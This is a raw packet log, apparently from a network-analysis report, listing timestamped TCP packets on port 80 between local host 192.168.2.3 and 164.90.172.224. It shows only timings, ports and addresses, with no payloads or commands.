                                    Jan 13, 2023 05:12:09.545348883 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545348883 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545371056 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545393944 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545394897 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545419931 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545443058 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545465946 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545489073 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545511961 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545533895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545558929 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545559883 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545559883 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545582056 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545604944 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545627117 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545631886 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545631886 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545649052 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545695066 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545718908 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545737028 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545778990 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545815945 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545823097 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545917034 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.545934916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.545979023 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546021938 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546066046 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546084881 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546107054 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546122074 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546132088 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546154022 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546195984 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546212912 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546221018 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546241999 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546247005 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546305895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546320915 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546330929 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546354055 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.546489000 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.546561003 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.623450994 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.653882980 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.653951883 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654000044 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654048920 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654094934 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654130936 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654134989 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654134989 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654179096 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654225111 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654270887 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654316902 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654325962 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654365063 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654407024 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654412031 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654460907 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654495001 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654508114 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654555082 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654604912 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654652119 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654686928 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654723883 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654771090 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654805899 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654817104 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654864073 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654910088 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654911995 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.654956102 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.654999971 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655013084 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655045986 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655092001 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655137062 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655144930 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655169964 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655184031 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655229092 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655253887 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655273914 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655318975 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655363083 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655405998 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655409098 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655446053 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655456066 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655500889 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655546904 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655554056 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655591965 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655636072 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655680895 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655716896 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655716896 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655725956 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655770063 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655814886 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655859947 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655906916 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655941010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655941010 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.655951023 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.655994892 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656039953 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656075954 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.656075954 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.656085014 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656130075 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656177044 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656219959 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.656250000 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.656250000 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.656265974 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.661225080 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.707988024 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.738008976 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738038063 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738059044 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738078117 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738095045 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738118887 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.738130093 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738181114 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.738181114 CET4969880192.168.2.3164.90.172.224
                                    Jan 13, 2023 05:12:09.738190889 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738219976 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738267899 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738310099 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738364935 CET8049698164.90.172.224192.168.2.3
                                    Jan 13, 2023 05:12:09.738380909 CET4969880192.168.2.3164.90.172.224
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 13, 2023 05:12:09.738437891 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738452911 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.738467932 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738502979 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738528013 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.738535881 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738571882 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738637924 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738665104 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.738673925 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738724947 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738797903 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738835096 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738873959 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738954067 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.738984108 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739017010 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739017010 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739058018 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739079952 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739118099 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739159107 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739242077 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739274979 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739296913 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739296913 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739362001 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739396095 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739418030 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739438057 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739475012 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739516973 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739675045 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739713907 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739736080 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739736080 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739754915 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739789963 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739811897 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739835024 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.739893913 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.739950895 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740036011 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740073919 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740094900 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.740114927 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740150928 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740204096 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740252972 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740274906 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.740274906 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.740314007 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740336895 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.740394115 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740437031 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740475893 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740495920 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740514994 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.740618944 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.740618944 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.767805099 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.767827034 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.767846107 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.767863035 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.767904997 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.767904997 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768045902 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768064976 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768085003 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768104076 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768140078 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768140078 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768145084 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768182039 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768203020 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768222094 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768240929 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768254042 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768254042 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768259048 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768279076 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768299103 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768331051 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768331051 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768529892 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768626928 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768646955 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768666983 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768666983 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768686056 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768706083 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768724918 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.768755913 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768755913 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.768796921 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769048929 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769078970 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769098997 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769110918 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769110918 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769119024 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769155979 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769157887 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769157887 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769176006 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769195080 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769208908 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769243002 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769243002 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769450903 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769484997 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769517899 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769517899 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769525051 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769561052 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769608974 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769646883 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769665956 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769676924 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769676924 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.769685030 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769720078 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.769867897 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.770248890 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.770294905 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.770314932 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.770334005 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.770348072 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.770348072 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.770370960 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.770437002 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798393965 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798422098 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798441887 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798460960 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798480988 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798500061 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798518896 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798537970 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798544884 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798544884 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798556089 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798576117 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798594952 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798613071 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798634052 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798638105 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798638105 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798652887 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798671961 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798698902 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798718929 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798722982 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798722982 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798738003 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798758030 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798777103 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798794031 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798794985 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798796892 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798815966 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798835039 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798854113 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798868895 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798868895 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798871994 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798891068 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798909903 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798927069 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798944950 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798944950 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.798945904 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.798964024 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799037933 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799037933 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799104929 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799245119 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799266100 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799287081 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799305916 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799325943 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799344063 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799364090 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799371004 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799371004 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799382925 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799401999 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799420118 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799438953 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799463987 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799463987 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799530029 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799880028 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799901962 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799921989 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799942970 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799962997 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799982071 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.799982071 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.799983025 CET  49698        80         192.168.2.3     164.90.172.224
Jan 13, 2023 05:12:09.800017118 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.800036907 CET  80           49698      164.90.172.224  192.168.2.3
Jan 13, 2023 05:12:09.800040007 CET  49698        80         192.168.2.3     164.90.172.224
